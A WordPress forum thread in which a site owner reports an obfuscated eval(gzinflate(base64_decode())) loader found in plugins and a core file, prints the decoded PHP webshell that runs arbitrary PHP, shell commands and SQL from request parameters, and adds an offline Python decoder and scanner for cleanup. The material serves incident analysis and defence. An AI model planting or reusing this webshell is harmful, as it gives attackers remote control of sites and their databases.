mbroyles
Forum Replies Created
Forum: Fixing WordPress
In reply to: Can’t post/edit: requesting authentication “magic”

Code was also found in the file wp-includes/vars.php. I removed the malicious code from the top of the file and no longer see the ‘Magic’ login prompt.
Forum: Fixing WordPress
In reply to: Can’t post/edit: requesting authentication “magic”

The following code was found on my client’s WP site in two separate plug-ins. The code was found at the top of each page (when you click the edit link for the plugin).

    eval(gzinflate(base64_decode('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'))); ?>

I expanded the eval code. Here is what it expanded to:

    {
        if (!function_exists('______safeshell')) {
            // Command runner: first tries to undo safe_mode / open_basedir, then
            // walks through every execution primitive PHP offers, skipping any
            // listed in disable_functions, and echoes the command output.
            function ______safeshell($komut)
            {
                @ini_restore("safe_mode");
                @ini_restore("open_basedir");
                $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
                if (!empty($komut)) {
                    if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                        //@ ob_start();
                        @ passthru($komut);
                        //$res = @ ob_get_contents();
                        //@ ob_end_clean();
                    } elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                        //@ ob_start();
                        @ system($komut);
                        //$res = @ ob_get_contents();
                        //@ ob_end_clean();
                    } elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                        $res = @ shell_exec($komut);
                        echo $res;
                    } elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                        @ exec($komut, $res);
                        $res = join("\n", $res);
                        echo $res, "\n";
                    } elseif (@ is_resource($f = @ popen($komut, "r"))) {
                        //$res = "";
                        while (!@ feof($f)) {
                            //$res .= @ fread($f, 1024);
                            echo(@ fread($f, 1024));
                        }
                        @ pclose($f);
                    } else {
                        // Last resort: the backtick (shell execution) operator.
                        $res = `{$komut}`;
                        echo $res;
                    }
                }
            }
        };

        // Dispatcher: the request parameter php_<32 hex chars> selects the mode
        // ('eval', 'exec' or 'query') and 'cmd' carries the PHP code, shell
        // command or SQL to run. Output is wrapped in a tag named after the key.
        if (isset($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) {
            echo "<php_5d14d8a172740f7088452acbd560c192_result>\n";
            if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'eval') {
                // Arbitrary PHP execution.
                eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
            } else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') {
                // Arbitrary OS command execution.
                ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
            } else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') {
                // Arbitrary SQL against the WordPress database, reusing the
                // site's own open connection ($wpdb->dbh); results come back serialized.
                $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
                if (!$result) {
                    echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                    die();
                } else if (is_resource($result)) {
                    $res = array();
                    while ($row = mysql_fetch_assoc($result)) {
                        $res[] = $row;
                    };
                    mysql_free_result($result);
                    echo serialize($res);
                    die();
                } else {
                    // ($wbdb is a typo for $wpdb in the recovered sample; left as found.)
                    echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                    die();
                }
            };
            echo "\n</php_5d14d8a172740f7088452acbd560c192_result>\n";
            die();
        };
    };

Looks like it gives the ability to run shell commands and MySQL DB queries via remote POST and GET requests.
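An added triage helper for loaders of this shape, not code from the post or from WordPress: it decodes an eval(gzinflate(base64_decode('…'))) payload offline instead of running it (PHP's gzinflate() is a raw DEFLATE stream, so zlib with wbits=-15 reproduces it), peels nested layers in case the packer was applied more than once, and flags the indicators visible in the decoded shell above (the php_<32 hex> request key, the passthru/shell_exec fallbacks, mysql_query, the open_basedir reset). The indicator list, the scan_tree root path and the sample plugin file are assumptions constructed for the dry run; the sample shell inside it is a cut-down stand-in modelled on the decoded code in the post.

```python
"""Offline decoder/scanner for eval(gzinflate(base64_decode('...'))) loaders.

Added example (not the poster's code). Decodes without eval, peels nested
layers, and reports webshell indicators found in the decoded text.
"""
import base64
import re
import zlib
from pathlib import Path

# Loader shape from the post: eval(gzinflate(base64_decode('<base64>')));
LOADER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)"
)

# Assumed indicator set, taken from the decoded shell: request key is
# "php_" + 32 hex chars; command fallbacks; raw SQL; open_basedir reset.
SHELL_INDICATORS = [
    r"\$_REQUEST\['php_[0-9a-f]{32}'\]",
    r"\bpassthru\s*\(",
    r"\bshell_exec\s*\(",
    r"\bmysql_query\s*\(",
    r"ini_restore\s*\(\s*['\"]open_basedir",
]


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() consumes a raw DEFLATE stream: zlib with wbits=-15."""
    return zlib.decompress(data, -15)


def unpack(src: str, max_layers: int = 8) -> tuple[str, int]:
    """Peel nested loaders without executing anything.

    Returns (innermost decoded text, number of layers peeled)."""
    layers = 0
    while layers < max_layers:
        m = LOADER_RE.search(src)
        if not m:
            break
        raw = base64.b64decode(m.group(1), validate=True)
        src = gzinflate(raw).decode("utf-8", "replace")
        layers += 1
    return src, layers


def scan_source(src: str) -> list[dict]:
    """Find every loader in one file's text and report what it hides."""
    findings = []
    for m in LOADER_RE.finditer(src):
        finding = {"offset": m.start(), "decoded": None, "layers": 0,
                   "indicators": [], "error": None}
        try:
            decoded, layers = unpack(m.group(0))
            finding.update(
                decoded=decoded, layers=layers,
                indicators=[p for p in SHELL_INDICATORS if re.search(p, decoded)])
        except (ValueError, zlib.error) as exc:  # bad base64 or truncated stream
            finding["error"] = str(exc)
        findings.append(finding)
    return findings


def scan_tree(root: str) -> dict[str, list[dict]]:
    """Scan every .php file under root (core, plugins and themes alike)."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


# ---- constructed sample for a dry run (stand-in, not the real payload) ----
def pack_sample(php: str) -> str:
    """Wrap text in the same loader shape, to produce test input only."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)           # raw DEFLATE
    blob = base64.b64encode(co.compress(php.encode()) + co.flush()).decode()
    return f"eval(gzinflate(base64_decode('{blob}')));"


SAMPLE_SHELL = (
    "if (isset($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) {\n"
    "  if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') { @ passthru($_REQUEST['cmd']); }\n"
    "  if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') { mysql_query($_REQUEST['cmd']); }\n"
    "}\n"
)
# Packed twice: the outer eval() decodes to another eval() loader.
SAMPLE_PLUGIN = ("<?php\n/* Plugin Name: Example */\n"
                 + pack_sample(pack_sample(SAMPLE_SHELL)) + " ?>\n")

if __name__ == "__main__":
    for f in scan_source(SAMPLE_PLUGIN):
        print(f"loader at byte {f['offset']}: {f['layers']} layer(s), "
              f"indicators {f['indicators']}")
```

Point scan_tree at the document root (for example scan_tree('/var/www/html'), path assumed) and review every hit, not just the first: the poster found the same loader in two plugins and again in wp-includes/vars.php, so one deletion is not a cleanup. The decoded request key (php_5d14d8a172740f7088452acbd560c192) doubles as a search term for the web server access log to learn whether the shell was actually used and what was sent in cmd.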